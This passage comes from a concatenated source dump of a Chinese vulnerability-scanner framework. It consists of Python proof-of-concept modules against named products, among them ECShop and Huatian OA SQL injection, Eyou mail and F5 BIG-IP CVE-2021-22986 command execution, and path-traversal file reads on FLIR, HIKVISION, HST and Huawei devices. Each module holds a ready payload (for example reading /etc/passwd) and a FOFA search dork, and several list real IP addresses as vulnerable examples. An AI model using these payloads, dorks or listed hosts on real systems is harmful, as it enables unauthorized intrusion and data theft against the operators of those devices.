41 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
42 |
43 | 不存在漏洞:vuln = [False,""]
44 | """
45 | vuln = [False,""]
46 | url = self.target + "/cgi-bin/ExportSettings.sh" # url自己按需调整
47 |
48 |
49 | headers = {"User-Agent":get_random_ua(),
50 | "Connection":"close",
51 | # "Content-Type": "application/x-www-form-urlencoded",
52 | }
53 |
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
57 | """
58 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
59 | if "The following line" in req.text and "Login" in req.text and "Password" in req.text and req.status_code == 200 :
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,req.text]
63 | except Exception as e:
64 | raise e
65 |
66 | # 以下逻辑酌情使用
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
--------------------------------------------------------------------------------
/poc/DedeCMS_织梦/RadminPass/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "织梦CMS radminpass.php文件暴露", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "dedecms", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | radminpass.php文件是一个用于修改管理员密码的PHP脚本工具
27 | 多出现在新手站长用过这个工具以后忘记删了
28 | """, # 漏洞简要描述
29 |
30 | "fofa-dork":"""
31 | app="DedeCMS"
32 | """, # fofa搜索语句
33 | "example" : "", # 存在漏洞的演示url,写一个就可以了
34 | "exp_img" : "", # 先不管
35 | }
36 |
37 | def _verify(self):
38 | """
39 | 返回vuln
40 |
41 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
42 |
43 | 不存在漏洞:vuln = [False,""]
44 | """
45 | vuln = [False,""]
46 | url = self.target + "/radminpass.php" # url自己按需调整
47 |
48 |
49 | headers = {"User-Agent":get_random_ua(),
50 | "Connection":"close",
51 | # "Content-Type": "application/x-www-form-urlencoded",
52 | }
53 |
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
57 | """
58 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
59 | if "http://yousite/radminpass.php" in req.text:#req.status_code == 200 and :
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,req.text]
63 | except Exception as e:
64 | raise e
65 |
66 | # 以下逻辑酌情使用
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
--------------------------------------------------------------------------------
/poc/ECShop/SQLi_delete_cart_goods/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "2", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | v1 : 略
18 | v2 : 小改进
19 | """, # POC描述,写更新描述,没有就不写
20 |
21 | "name" : "ECShop 4.1.0前台 delete_cart_goods.php SQL注入(CNVD-2020-58823)", # 漏洞名称
22 | "VulnID" : "CNVD-2020-58823", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
23 | "AppName" : "ECShop", # 漏洞应用名称
24 | "AppVersion" : "ecshop4.1.0及以下", # 漏洞应用版本
25 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
26 | "VulnDesc" : """
27 |
28 | """, # 漏洞简要描述
29 |
30 | "fofa-dork":"""
31 | app="ECShop"
32 | """, # fofa搜索语句
33 | "example" : "", # 存在漏洞的演示url,写一个就可以了
34 | "exp_img" : "", # 先不管
35 | }
36 |
37 | def _verify(self):
38 | """
39 | 返回vuln
40 |
41 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
42 |
43 | 不存在漏洞:vuln = [False,""]
44 | """
45 | vuln = [False,""]
46 | url = self.target + "/delete_cart_goods.php" # url自己按需调整
47 | data = "id=0||(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))"
48 |
49 | headers = {"User-Agent":get_random_ua(),
50 | "Connection":"close",
51 | "Content-Type": "application/x-www-form-urlencoded",
52 | }
53 |
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
57 | """
58 | req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
59 | if "MySQL server error report" in req.text:#req.status_code == 200 and :
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,req.text]
63 | except Exception as e:
64 | raise e
65 |
66 | # 以下逻辑酌情使用
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
--------------------------------------------------------------------------------
/poc/Eyou_亿邮/RCE_moni_detail/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "hansi", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "亿邮电子邮件系统 远程命令执行", # 漏洞名称
21 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "Eyou 亿邮电子邮件系统", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 |
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | body="亿邮电子邮件系统"
31 |
32 | title="亿邮电子邮件系统"
33 | """, # fofa搜索语句
34 | "example" : "https://59.63.125.111:443", # 存在漏洞的演示url,写一个就可以了
35 | "exp_img" : "", # 先不管
36 | }
37 |
38 | # timeout = 10
39 |
40 |
41 | def _verify(self):
42 | """
43 | 返回vuln
44 |
45 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
46 |
47 | 不存在漏洞:vuln = [False,""]
48 | """
49 | vuln = [False,""]
50 | url = self.target + "/webadm/?q=moni_detail.do&action=gragh" # url自己按需调整
51 |
52 |
53 | headers = {"User-Agent":get_random_ua(),
54 | "Connection":"close",
55 | "Content-Type": "application/x-www-form-urlencoded",
56 | }
57 | data = "type='|cat /etc/passwd||'"
58 | try:
59 | """
60 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
61 | """
62 | req = requests.post(url,headers = headers , data=data, proxies = self.proxy ,timeout = self.timeout,verify = False)
63 | if req.status_code == 200 and "root:/root" in req.text:
64 | vuln = [True,req.text]
65 | else:
66 | vuln = [False,req.text]
67 | except Exception as e:
68 | raise e
69 |
70 | # 以下逻辑酌情使用
71 | if self._honeypot_check(vuln[1]) == True:
72 | vuln[0] = False
73 |
74 | return vuln
75 |
76 | def _attack(self):
77 | return self._verify()
--------------------------------------------------------------------------------
/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "CVE-2021-22986 RCE", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 |
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | title="BIG-IP®"
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/mgmt/tm/util/bash" # url自己按需调整
46 | data = r'''{"command": "run", "utilCmdArgs": "-c 'cat /etc/passwd'"}'''
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | 'Accept': '*/*',
50 | 'Connection': 'close',
51 | 'Authorization': 'Basic YWRtaW46',
52 | 'X-F5-Auth-Token': '',
53 | 'Content-Type': 'application/json'
54 | }
55 |
56 | try:
57 | """
58 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
59 | """
60 | req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
61 | if "root:/root" in req.text and req.status_code == 200:
62 | vuln = [True,req.text]
63 | else:
64 | vuln = [False,req.text]
65 | except Exception as e:
66 | raise e
67 |
68 | # 以下逻辑酌情使用
69 | if self._honeypot_check(vuln[1]) == True:
70 | vuln[0] = False
71 |
72 | return vuln
73 |
74 | def _attack(self):
75 | return self._verify()
--------------------------------------------------------------------------------
/poc/FLIR_菲力尔/Download_File_AX8/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "FLIR-AX8 download.php 任意文件下载", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "FLIR-AX8", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | app="FLIR-FLIR-AX8"
31 | """, # fofa搜索语句
32 | "example" : "http://124.103.98.183:82", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/download.php?file=/etc/passwd" # url自己按需调整
46 |
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | # "Content-Type": "application/x-www-form-urlencoded",
51 | }
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
56 | """
57 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
58 | if "root:x" in req.text and req.status_code == 200 :
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,req.text]
62 | except Exception as e:
63 | raise e
64 |
65 | # 以下逻辑酌情使用
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/H5S_视频平台/Info_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "hansi", # POC作者
14 | "version" : "1", # POC版本,默认是1
15 | "CreateDate" : "2022-1-10", # POC创建时间
16 | "UpdateDate" : "2022-1-10", # POC创建时间
17 | "PocDesc" : """
18 | 该系统存在查询信息接口,泄露大量敏感信息
19 |
20 | """, # POC描述,写更新描述,没有就不写
21 |
22 | "name" : "H5S视频平台api信息泄露漏洞", # 漏洞名称
23 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
24 | "AppName" : "H5S视频平台", # 漏洞应用名称
25 | "AppVersion" : "无", # 漏洞应用版本
26 | "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
27 | "VulnDesc" : """
28 |
29 | """, # 漏洞简要描述
30 |
31 | "fofa-dork":"", """
32 | H5S视频平台
33 | """ # fofa搜索语句
34 | "example" : "", # 存在漏洞的演示url,写一个就可以了
35 | "exp_img" : "", # 先不管
36 |
37 | }
38 |
39 | #timeout = 10
40 |
41 | def _verify(self):
42 | """
43 | 返回vuln
44 |
45 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
46 |
47 | 不存在漏洞:vuln = [False,""]
48 | """
49 | vuln = [False,""]
50 | url = self.target + "/api/v1/GetSrc" # url自己按需调整
51 | # date="command1=shell:ifconfig| dd of=/tmp/a.txt"
52 |
53 | headers = {"User-Agent":get_random_ua(),
54 | "Connection":"close",
55 | "Content-Type": "application/x-www-form-urlencoded",
56 | }
57 |
58 | try:
59 | """
60 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
61 | """
62 | req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
63 | if "src" and "nType" and "strName" in req.text and req.status_code == 200 :
64 | vuln = [True,req.text]
65 | else:
66 | vuln = [False,req.text]
67 | except Exception as e:
68 | raise e
69 |
70 | if self._honeypot_check(vuln[1]) == True:
71 | vuln[0] = False
72 |
73 | return vuln
74 |
75 |
76 | def _attack(self):
77 | return self._verify()
--------------------------------------------------------------------------------
/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "HIKVISION 视频编码设备接入网关 任意文件下载", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "海康威视视频接入网关系统", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | 海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | title="视频编码设备接入网关"
31 | """, # fofa搜索语句
32 | "example" : "http://211.137.239.52:7288", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php" # url自己按需调整
46 |
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | # "Content-Type": "application/x-www-form-urlencoded",
51 | }
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
56 | """
57 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
58 | if "$file_name" in req.text and req.status_code == 200 :
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,req.text]
62 | except Exception as e:
63 | raise e
64 |
65 | # 以下逻辑酌情使用
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "HIKVISION 流媒体管理服务器弱口令", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "HIKVISION 流媒体管理服务器", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | 略
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | title="流媒体管理服务器"
31 | """, # fofa搜索语句
32 | "example" : "http://112.53.234.26:7788", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/data/login.php" # url自己按需调整
46 | data = "userName=YWRtaW4=&password=MTIzNDU="
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | "Content-Type": "application/x-www-form-urlencoded",
51 | }
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
56 | """
57 | req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
58 | if req.status_code == 200 and req.text == "0":
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,req.text]
62 | except Exception as e:
63 | raise e
64 |
65 | # 以下逻辑酌情使用
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/HST_好视通/File_Download/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "好视通视频会议平台 任意文件下载", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "好视通视频会议平台", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 |
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | app="好视通-视频会议"
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini" # url自己按需调整
46 |
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | # "Content-Type": "application/x-www-form-urlencoded",
51 | }
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
56 | """
57 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
58 | if "; for 16-bit app support" in req.text and req.status_code == 200 :
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,req.text]
62 | except Exception as e:
63 | raise e
64 |
65 | # 以下逻辑酌情使用
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/HST_好视通/File_Read/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-09-20", # POC创建时间
15 | "UpdateDate" : "2022-09-20", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "好视通视频平台 任意文件读取", # 漏洞名称
21 | "VulnID" : "oFx-2022-0003", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "好视通视频会议平台", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2022-09-20", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 |
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | app="好视通-视频会议"
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/register/toDownload.do?fileName=..\..\..\..\FMServer/ServiceConfig.xml" # url自己按需调整
46 |
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | # "Content-Type": "application/x-www-form-urlencoded",
51 | }
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
56 | """
57 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
58 | if "fastmeeting" and "live_ice.cfg"in req.text and req.status_code == 200 :
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,req.text]
62 | except Exception as e:
63 | raise e
64 |
65 | # 以下逻辑酌情使用
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
73 |
--------------------------------------------------------------------------------
/poc/HT_华天OA/Sqli_ApiController/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "hansi", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-10-11", # POC创建时间
15 | "UpdateDate" : "2022-10-11", # POC创建时间
16 | "PocDesc" : """
17 |
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "华天动力OAsql注入漏洞", # 漏洞名称
21 | "VulnID" : "oFx-2022-1011", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2022-10-11", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 |
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | app="华天动力-OA8000"
31 | """, # fofa搜索语句
32 | "example" : "http://14.29.237.26:88/", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 |
37 | def _verify(self):
38 | """
39 | 返回vuln
40 |
41 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
42 |
43 | 不存在漏洞:vuln = [False,""]
44 | """
45 | vuln = [False,""]
46 | url = self.target + "/OAapp/HtClientServlet2" # url自己按需调整
47 |
48 |
49 | headers = {"User-Agent":get_random_ua(),
50 | "Connection":"close",
51 | "Content-Type": "application/x-www-form-urlencoded",
52 | }
53 | data = "command=getChat&receiver='%20or%201=1%20or%20''='"
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
57 | """
58 | req = requests.post(url,headers = headers, data = data, proxies = self.proxy ,timeout = self.timeout,verify = False)
59 | if req.status_code == 200 and "W3siY29udGVudCI6" in req.text:
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,req.text]
63 | except Exception as e:
64 | raise e
65 |
66 | # 以下逻辑酌情使用
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
74 |
--------------------------------------------------------------------------------
/poc/Huawei/File_Read_HG659_lib/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "Huawei HG659 lib 任意文件读取漏洞", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "Huawei HG659", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | Huawei HG659 lib 存在任意文件读取漏洞,攻击者通过漏洞可以读取任意文件
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | app="HUAWEI-Home-Gateway-HG659"
31 | """, # fofa搜索语句
32 | "example" : "https://121.74.170.192:443", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/lib///....//....//....//....//....//....//....//....//etc//passwd" # url自己按需调整
46 |
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | # "Content-Type": "application/x-www-form-urlencoded",
51 | }
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
56 | """
57 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
58 | if "root:x:0" in req.text:#req.status_code == 200 and :
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,req.text]
62 | except Exception as e:
63 | raise e
64 |
65 | # 以下逻辑酌情使用
